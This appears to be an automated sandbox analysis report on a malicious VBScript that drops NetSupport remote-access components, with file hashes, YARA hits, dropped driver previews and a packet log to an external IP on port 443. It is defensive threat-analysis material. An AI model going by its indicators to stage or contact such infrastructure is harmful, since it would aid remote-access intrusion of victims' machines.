                                                                                                                    SSDEEP:3072:Pm0oPFxNrTUEtzjHlBs/Z5GQFvSeGjreejq:loxrTUEtFBsPGIaemeN
                                                                                                                    MD5:0488F2B6A068F6FAD881A45E427068A2
                                                                                                                    SHA1:B1E6B587D1F1A18C3E8F324C06BDE36608DF11A2
                                                                                                                    SHA-256:E4227BED56D1EA54FE8D4A0D60F68C1B805433F5A083C889F1EBE61D5901654E
                                                                                                                    SHA-512:56A2615AA3BF101430830C6832E494B2448CF8BCE1DA850AC0A9F6D55304508851590D360666B8926369E1FA925514F544BD5BA24E02192113018B6869079499
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\System32\client32provider.dll, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^..?...?...?...I...?...G...?...G...?...?...?...I...?...I...?...I...?...I...?...I...?..Rich.?..................PE..d...}.oe.........." ................TX..............................................q...............................................p&...............p..\....`.......<...]..............................................................p............................text............................... ..`.rdata...W.......X..................@..@.data....$...0......................@....pdata.......`....... ..............@..@.rsrc...\....p......................@..@.reloc...............6..............@..B................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\System32\drivers\nskbfltr.sys

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):33408
                                                                                                                    Entropy (8bit):6.382369861010622
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:mbjTW3njbfudD/lgV1co3+iMMGi/cKnLEJFs:uW3WD/lgv+F7KnN
                                                                                                                    MD5:1C2143ADEAB91D77EB5A9624BD28B283
                                                                                                                    SHA1:5F8BB1A5A6AE56AF8BBD60ACD1C4C67CFD8E26B1
                                                                                                                    SHA-256:F897746F7FC866B9FC100F36D6896B883E55B08C5AE9E7D8358FCDB937C6C097
                                                                                                                    SHA-512:0D9A5C2130496F4EF4B06AD55BE7BA84190A36E0D8412FA11E816EF53BBAE413CB11742C053644D6F4DF44D19746DB0EA420D0426B83EB1A298D42E9E48D11A2
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\System32\drivers\nskbfltr.sys, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r2..6S.W6S.W6S.W...W5S.W..'W4S.W..&W4S.W...W4S.W6S.W$S.W@..W5S.W@..W7S.W...W;S.W...W4S.W@..W7S.W...W5S.W...W7S.W...W7S.WRich6S.W........PE..d...Q.(Y.........."......J...$.......(..........................................................................................................<...............(....d..........4....P...............................................P...............................text....=.......>.................. ..h.rdata..H....P.......B..............@..H.data........`.......J..............@....pdata..(............N..............@..HPAGE....9............R.............. ..`INIT.................X.............. ....rsrc................^..............@..B.reloc...............b..............@..B........................................................................................................................................................

                                                                                                                    C:\Windows\System32\drivers\nskbfltr2.sys

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):34008
                                                                                                                    Entropy (8bit):6.39207103344199
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:QbG73Znjbfudxpl7x1u33FrFteVVJKZg0ymNjB:B3ZWxpl7KFcKZgCH
                                                                                                                    MD5:FE21DE1984A1DB19D520F01BADAE7087
                                                                                                                    SHA1:13DEE984774E0E3605B8D9E34E73F79EFDAAB1E3
                                                                                                                    SHA-256:E7E628DE2ED025AD146328E86FA7AB83A79962972CC847263F984EDC567D6E7C
                                                                                                                    SHA-512:1C79A62CB6E695A5178D8C28CACC765977981A9FA0E005126D29CB82042F175569C88D51E3003148116F9CBAD68412DC597817B2C1C9688E1EA34ACF79E56AF5
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p2..4S.W4S.W4S.W...W7S.W..'W6S.W..&W6S.W...W6S.W4S.W%S.WB..W7S.WB..W5S.W...W9S.W...W6S.WB..W5S.W...W7S.W...W5S.W...W5S.WRich4S.W........PE..d.....cT.........."......H...$.......&..............................................."..........................................................<...............(....b..."......4....P...............................................P...............................text...];.......<.................. ..h.rdata..$....P.......@..............@..H.data........`.......H..............@....pdata..(............L..............@..HPAGE.................P.............. ..`INIT.................V.............. ....rsrc................\..............@..B.reloc...............`..............@..B........................................................................................................................................................

                                                                                                                    C:\Windows\Temp\~DF13A71D0652B9A3A5.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Temp\~DF2596504C0FA8DCFE.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Temp\~DF346C0BEEE8F66326.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):49152
                                                                                                                    Entropy (8bit):1.429807567711258
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:LcbHT38vUMPwJZr+kZUfrWbrAiQc2IO0dqffKMuOkIrqaktfhWbrAs6P:YbHzay4cLOUCfKMPqYw
                                                                                                                    MD5:B50692E89037D869FA4FEF497AAF32B1
                                                                                                                    SHA1:B9F20B44E694137A7075BE34508202D938BDF0E4
                                                                                                                    SHA-256:57B6DB1C6B16B248F77F17FE3F0919E8E3A52DD020F1F47219AAF49E649F6258
                                                                                                                    SHA-512:4AAB46DC8920F384BA68B984CADD72569E32AB3B71D5AB1772E869491FA78BCFCC5E71F9D0E5456AE642125B79C5DF5971C4BE3AB69A9C1BA5EB5F5FC4C61283
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Temp\~DF520DE6A69A0805D5.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):49152
                                                                                                                    Entropy (8bit):1.429807567711258
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:LcbHT38vUMPwJZr+kZUfrWbrAiQc2IO0dqffKMuOkIrqaktfhWbrAs6P:YbHzay4cLOUCfKMPqYw
                                                                                                                    MD5:B50692E89037D869FA4FEF497AAF32B1
                                                                                                                    SHA1:B9F20B44E694137A7075BE34508202D938BDF0E4
                                                                                                                    SHA-256:57B6DB1C6B16B248F77F17FE3F0919E8E3A52DD020F1F47219AAF49E649F6258
                                                                                                                    SHA-512:4AAB46DC8920F384BA68B984CADD72569E32AB3B71D5AB1772E869491FA78BCFCC5E71F9D0E5456AE642125B79C5DF5971C4BE3AB69A9C1BA5EB5F5FC4C61283
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Temp\~DF70FBB2986E97B213.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Temp\~DF8766ED0ABB948471.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):73728
                                                                                                                    Entropy (8bit):0.4720837661940882
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:YXdrqaktfhWbrAslZr+kZUfrWbrAiQc2IO0dqffKMuOkWeP:Y5qYv4cLOUCfKMA
                                                                                                                    MD5:C47764774A6674A7B0CAA889CB49D071
                                                                                                                    SHA1:43EFBF7D98B2EC424859C0CE0D9E7B9865DE0788
                                                                                                                    SHA-256:0FECBF786DF2A3C90A2D1E60616AB94C32BA4AE3696B63A90B815155BE5695AC
                                                                                                                    SHA-512:E1ACD560B834BE281340CBD08249AC87B80D359CE0DF5EAC4A8B11FE24CB546C4B12BFFEAFA5CB6534DFDD87E9A81A19C92B6780B79F827E318D018886E70AA7
                                                                                                                    Malicious:false
                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Temp\~DFA8C970BB79EAAF13.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):24576
                                                                                                                    Entropy (8bit):2.2099910368114806
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:ZhU1FFTFPwJZr+kZUfrWbrAiQc2IO0dqffKMuOkIrqaktfhWbrAs6P:Y1nxy4cLOUCfKMPqYw
                                                                                                                    MD5:028B4FDBCF2D91D3D240605C8D70EFF1
                                                                                                                    SHA1:C37412C478219DE8E590CBBCD7DBF89A41A919F2
                                                                                                                    SHA-256:6A89784930F481E9BC67FD4A3D734AB813F742288512BB52C15455356B89110A
                                                                                                                    SHA-512:5CC5A3A014804F5CB74D5FD0BF1AE45AB920417A8DDB3784A70F16C7B1E6C0C8EBF7A08B113FD46414D16F6DDAF32B3A349A5CB4D28E048A30087E03A4ADAB70
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Temp\~DFAC3EF9319328B0CD.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):49152
                                                                                                                    Entropy (8bit):1.429807567711258
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:LcbHT38vUMPwJZr+kZUfrWbrAiQc2IO0dqffKMuOkIrqaktfhWbrAs6P:YbHzay4cLOUCfKMPqYw
                                                                                                                    MD5:B50692E89037D869FA4FEF497AAF32B1
                                                                                                                    SHA1:B9F20B44E694137A7075BE34508202D938BDF0E4
                                                                                                                    SHA-256:57B6DB1C6B16B248F77F17FE3F0919E8E3A52DD020F1F47219AAF49E649F6258
                                                                                                                    SHA-512:4AAB46DC8920F384BA68B984CADD72569E32AB3B71D5AB1772E869491FA78BCFCC5E71F9D0E5456AE642125B79C5DF5971C4BE3AB69A9C1BA5EB5F5FC4C61283
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Temp\~DFD95CA365E0A4CF64.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Temp\~DFEAEE0BB3F0513DD9.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):24576
                                                                                                                    Entropy (8bit):2.2099910368114806
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:ZhU1FFTFPwJZr+kZUfrWbrAiQc2IO0dqffKMuOkIrqaktfhWbrAs6P:Y1nxy4cLOUCfKMPqYw
                                                                                                                    MD5:028B4FDBCF2D91D3D240605C8D70EFF1
                                                                                                                    SHA1:C37412C478219DE8E590CBBCD7DBF89A41A919F2
                                                                                                                    SHA-256:6A89784930F481E9BC67FD4A3D734AB813F742288512BB52C15455356B89110A
                                                                                                                    SHA-512:5CC5A3A014804F5CB74D5FD0BF1AE45AB920417A8DDB3784A70F16C7B1E6C0C8EBF7A08B113FD46414D16F6DDAF32B3A349A5CB4D28E048A30087E03A4ADAB70
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Temp\~DFEE9235A40D56EC58.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Temp\~DFFF77AA34837C9AE9.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):32768
                                                                                                                    Entropy (8bit):0.06882469791652747
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOScDuOfBxIxVYfoVky6l0t/:2F0i8n0itFzDHFVBfHIxVYL01
                                                                                                                    MD5:C1BC575C896A3D2D0959509A9AF52E65
                                                                                                                    SHA1:FD3ABC9423FE308DFE530AD922D7FC71EEA83E13
                                                                                                                    SHA-256:F2CE54F35A0EA6000C3781473F0CD557EF9942C20A162B232955861F20410208
                                                                                                                    SHA-512:203C53B8AB92261F320D105822C76392D175C9B696DE12EDDAB2F153A56C6D1F418F7C894F05982F78BF51869215FD5D7CE5ECF2C9BF69F8083ADA2938024C12
                                                                                                                    Malicious:false
                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\setupact.log

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\Installer\MSI3FCC.tmp
                                                                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):145
                                                                                                                    Entropy (8bit):5.054851762546473
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:T3ZOXfFrUW++8SFwEgORqD2AGqKwnF2phJDCuiqQWWLNKXNn:7ZOXfFrd8VEgORvprNCuVQon
                                                                                                                    MD5:479D3599C5C371F5F29787DAE5306448
                                                                                                                    SHA1:EBEBB6C61176730EC2CC988BD6EF249760E59F02
                                                                                                                    SHA-256:A95E73B0CD92BACCC6F6D7B542F813F085EDBA18FDFD819582D4180B227E53FA
                                                                                                                    SHA-512:A0B7516DADBCF4E1B6F8CEF50C88AD199E945CC1AA0BEDE14DA40CAC2E5A61A54E56F374B95D2EC8B506306A5370FDA49D8A4AD030402A4C38B318305FA463D0
                                                                                                                    Malicious:false
                                                                                                                    Preview:WdfCoInstaller: [11/22/2024 20:38.34.295] ReadComponents: WdfSection for Driver Service nskbfltr using KMDF lib version Major 0x1, minor 0x5 ...

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                    Entropy (8bit):6.129274995956151
                                                                                                                    TrID:
                                                                                                                      File name:Pyyidau.vbs
                                                                                                                      File size:8'816'052 bytes
                                                                                                                      MD5:c1108260f7a287cb16f93c11a40fbf90
                                                                                                                      SHA1:8eab07aef27baae17d1ce013cce58b2b43dcaa1d
                                                                                                                      SHA256:484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c
                                                                                                                      SHA512:59d3023cc0287ff45894bbcce2175c8fda7a36b2f1687ab7b93fb49a578e38f874587bed0e3d69eff1a20deb4f20fc27c1155026bd962d007c9b0e8c028edc0c
                                                                                                                      SSDEEP:49152:1uld2u6UP5rpZxEeMuatPwmOI06dzq5kz9zV7AujEy4q7YcGqaLjt1yLQ+RZyBvd:+P5j
                                                                                                                      TLSH:659623611EB0DE8C7B98953D7E7E6654D3E0CEB72C3BD19142A3E74A076AA410B12F31
                                                                                                                      File Content Preview:REM aJCqjC/kDlc8xh/2cnisFZu2sDPv/Usk5ZUNt0jFS+JaiIfTw6uuy6/Sql0s1eJi1zn2kE7/kGtEhaaZ1lcPd3o9nOrw2VHvCOSEHFLt+BCzquAPzruTWvccjj0FFfRYwzPj7zn4cv3nB4hpe3QYV42W5it2AKi/qUHy1EoT6vPvK1kfCgnWujjiJ8czKd+DAzewbi7I4sKKI0X3BZ2z0xyVek8a+UyDwCvzk9jgjH9ib9ATY3vEJkmWlOb

                                                                                                                      File Icon

                                                                                                                      Icon Hash:68d69b8f86ab9a86

                                                                                                                      Network Behavior

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Nov 23, 2024 02:37:08.230494976 CET49730443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:08.230531931 CET44349730176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:08.230597973 CET49730443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:08.241843939 CET49730443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:08.241856098 CET44349730176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:09.928354025 CET44349730176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:09.928433895 CET49730443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:10.013149977 CET49730443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:10.013189077 CET44349730176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:10.014101982 CET44349730176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:10.014173031 CET49730443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:10.019263983 CET49730443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:10.059356928 CET44349730176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:10.443453074 CET44349730176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:10.443603992 CET49730443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:10.443605900 CET44349730176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:10.443778992 CET49730443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:10.446089029 CET49730443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:10.446115017 CET44349730176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:10.494139910 CET49731443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:10.494205952 CET44349731176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:10.494389057 CET49731443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:10.494760990 CET49731443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:10.494791031 CET44349731176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:11.958334923 CET44349731176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:11.958508015 CET49731443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:11.958987951 CET49731443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:11.959003925 CET44349731176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:11.959358931 CET49731443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:11.959367037 CET44349731176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:12.487202883 CET44349731176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:12.487396955 CET44349731176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:12.487405062 CET49731443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:12.487457037 CET49731443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:12.488362074 CET49731443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:12.488380909 CET44349731176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:12.504591942 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:12.504626036 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:12.504712105 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:12.505001068 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:12.505013943 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:13.898180008 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:13.898263931 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:13.899019957 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:13.899025917 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:13.899344921 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:13.899348974 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.535685062 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.535746098 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.535775900 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.535799980 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.535825968 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.535841942 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.535861015 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.535868883 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.535903931 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.535929918 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.691675901 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.691734076 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.691751957 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.691780090 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.691804886 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.691828966 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.740748882 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.740798950 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.740827084 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.740834951 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.740861893 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.740874052 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.861320972 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.861367941 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.861407995 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.861413002 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.861447096 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.861466885 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.890336037 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.890378952 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.890412092 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.890415907 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.890441895 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.890460014 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.914477110 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.914520979 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.914562941 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.914567947 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.914606094 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.942409039 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.942452908 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.942501068 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:14.942507029 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:14.942550898 CET49732443192.168.2.4176.126.113.166
